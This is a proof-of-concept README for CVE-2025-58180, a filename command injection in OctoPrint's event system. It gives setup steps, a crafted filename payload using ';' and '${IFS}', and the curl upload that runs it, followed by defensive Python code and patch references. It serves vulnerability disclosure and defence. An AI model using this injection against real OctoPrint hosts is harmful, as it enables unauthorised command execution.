
CVE-2025-58180 PoC — OctoPrint is Vulnerable to RCE Attacks via Unsanitized Filename in File Upload

Associated Vulnerability
Title: OctoPrint is Vulnerable to RCE Attacks via Unsanitized Filename in File Upload (CVE-2025-58180)
Description: OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.11.2 contain a vulnerability that allows an authenticated attacker to upload a file under a specially crafted filename that will allow arbitrary command execution if said filename becomes included in a command defined in a system event handler and said event gets triggered. If no event handlers executing system commands with uploaded filenames as parameters have been configured, this vulnerability does not have an impact. The vulnerability is patched in version 1.11.3. As a workaround, OctoPrint administrators who have event handlers configured that include any kind of filename based placeholders should disable those by setting their `enabled` property to `False` or unchecking the "Enabled" checkbox in the GUI based Event Manager. Alternatively, OctoPrint administrators should set `feature.enforceReallyUniversalFilenames` to `true` in `config.yaml` and restart OctoPrint, then vet the existing uploads and make sure to delete any suspicious looking files. As always, OctoPrint administrators are advised to not expose OctoPrint on hostile networks like the public internet, and to vet who has access to their instance.
Readme
# CVE-2025-58180 RCE in OctoPrint via Unsanitized Filename in File Upload
In OctoPrint version <=1.11.2, an attacker with file upload access (e.g., a valid API key or session) can craft a malicious filename that bypasses sanitization and is later executed by OctoPrint's event system, leading to remote code execution (RCE) on the host.

---

## PoC: Steps to Recreate Vulnerability

### Step 1: Version Info
Downloaded latest stable release: **OctoPrint 1.11.2**

<img width="424" height="110" alt="image" src="https://github.com/user-attachments/assets/e7a16a14-29c0-4a15-958a-93417a94e346" />

---

### Step 2: Run OctoPrint
```bash
octoprint serve --port 5000 --debug
```

- Open [http://127.0.0.1:5000](http://127.0.0.1:5000) in browser.  
- Go through the initial wizard → create user with default settings (disabled: connectivity, anonymous, plugin).  
- Grab the API key from **Settings → API** → save for later.  
<img width="1626" height="973" alt="image" src="https://github.com/user-attachments/assets/52f45d63-aed0-41b8-bdf8-a60c958e92a0" />

Stop the OctoPrint service once the above steps are done.

---

### Step 3: Configure Event Subscription
Following [OctoPrint events documentation](https://docs.octoprint.org/en/master/events/index.html):

Edit `~/.octoprint/config.yaml`:

```yaml
events:
  enabled: true
  subscriptions:
    - event: FileAdded
      type: system
      debug: true
      command: "{path}"
```
<img width="880" height="305" alt="image" src="https://github.com/user-attachments/assets/942c253c-70c7-495c-8d29-f575d366b21a" />

---

### Step 4: Create Sample G-code
Create `/tmp/gcode/ok.gcode`:

```gcode
; minimal gcode
G28
M105
```

Restart OctoPrint service.

---

### Step 5: Proof of Concept RCE

1. Export API key:
```bash
export API_KEY='<key previously gathered from webUI>'
```

2. Verify file doesn’t exist:
```bash
ls -la /tmp/test123
```

3. Craft the malicious filename payload:
```bash
INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
```

Explanation: `${IFS}` is the shell's Internal Field Separator (usually a space). It bypasses sanitization when injected.

4. Send curl request:
```bash
curl -sS -X POST -H "X-Api-Key: $API_KEY" \
  -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
  "http://127.0.0.1:5000/api/files/local"
```

5. Verify execution:
```bash
ls -la /tmp/test123
```
<img width="1170" height="511" alt="image" src="https://github.com/user-attachments/assets/19fc4c6a-f488-4ae1-9032-ab10b23cd227" />

If `/tmp/test123` exists, the injected command executed successfully → **RCE confirmed**.

---

## Explanation of Flow

```
[User upload with crafted filename]
        │
        ▼
server/api/files.py → accepts raw filename (metacharacters survive sanitize_name)
        │
        ▼
events.py (EventManager.fire "FileAdded") → payload {path} includes raw chars
        │
        ▼
system command subscriber → subprocess.check_call(..., shell=True)
        │
        ▼
[Injected shell metacharacters execute as OS commands]
```

---

## Summary

When a file is uploaded:

1. OctoPrint accepts the filename (with limited sanitization).  
2. It triggers a **FileAdded** event.  
3. If system commands are subscribed to this event, the raw filename (including `;`, `${IFS}`, etc.) is passed into a shell.  
4. This allows injected commands inside the filename to execute on the host.  

**Result:** Remote Code Execution (RCE) on the host system.
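
The flow and summary above reduce to one pattern: an uploaded filename is substituted into a `{path}` placeholder and the resulting string is handed to a shell. As an added example (not OctoPrint's own code), the snippet below renders that vulnerable shape beside two defensive alternatives: an allow-list check in the spirit of the `feature.enforceReallyUniversalFilenames` workaround, and argv-style execution that never gives the filename to a shell. The regex, the `echo {path}` template and the sample names are assumptions constructed for this example.

```python
import re
import shlex
import subprocess

# Constructed sample names: a benign upload and one shaped like the PoC payload
# above (shell metacharacters embedded in the name, ${IFS} standing in for a space).
BENIGN_NAME = "ok.gcode"
CRAFTED_NAME = "octo;touch${IFS}/tmp/test123;#.gcode"

# Allow-list in the spirit of the enforceReallyUniversalFilenames workaround:
# ASCII letters, digits, dot, dash and underscore only, no leading dot. The exact
# pattern is an assumption for this example, not OctoPrint's implementation.
REALLY_UNIVERSAL = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")


def is_really_universal(name: str) -> bool:
    """Reject any filename that could carry shell syntax into a command."""
    return REALLY_UNIVERSAL.fullmatch(name) is not None


def render_unsafe(template: str, path: str) -> str:
    """The vulnerable shape: {path} pasted into one string destined for shell=True,
    so ';', '$' and '#' in the name become command syntax. Rendered only, never run."""
    return template.format(path=path)


def render_quoted(template: str, path: str) -> str:
    """If a shell string is unavoidable, quote the value so it stays a single word."""
    return template.format(path=shlex.quote(path))


def render_argv(template: str, path: str) -> list:
    """Preferred: split the template into argv first, then fill the placeholder
    per argument, so the name is delivered as one literal argument."""
    return [arg.format(path=path) for arg in shlex.split(template)]


def run_argv(template: str, path: str) -> str:
    """Execute the argv form without a shell and return what the program saw."""
    proc = subprocess.run(render_argv(template, path), capture_output=True,
                          text=True, check=True)
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    for name in (BENIGN_NAME, CRAFTED_NAME):
        print(f"{name!r}: universal={is_really_universal(name)}")
    print("unsafe :", render_unsafe("echo {path}", CRAFTED_NAME))
    print("quoted :", render_quoted("echo {path}", CRAFTED_NAME))
    print("argv   :", run_argv("echo {path}", CRAFTED_NAME))  # name echoed verbatim
```

With the argv form, `echo` receives the crafted name as plain text and nothing in `/tmp` is created; only the `render_unsafe` string, if it were passed to `shell=True`, would split into separate commands.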

---

## References

- CVE assigned: CVE-2025-58180, advisory [GHSA-49mj-x8jp-qvfc](https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc)
- Patched version: 1.11.3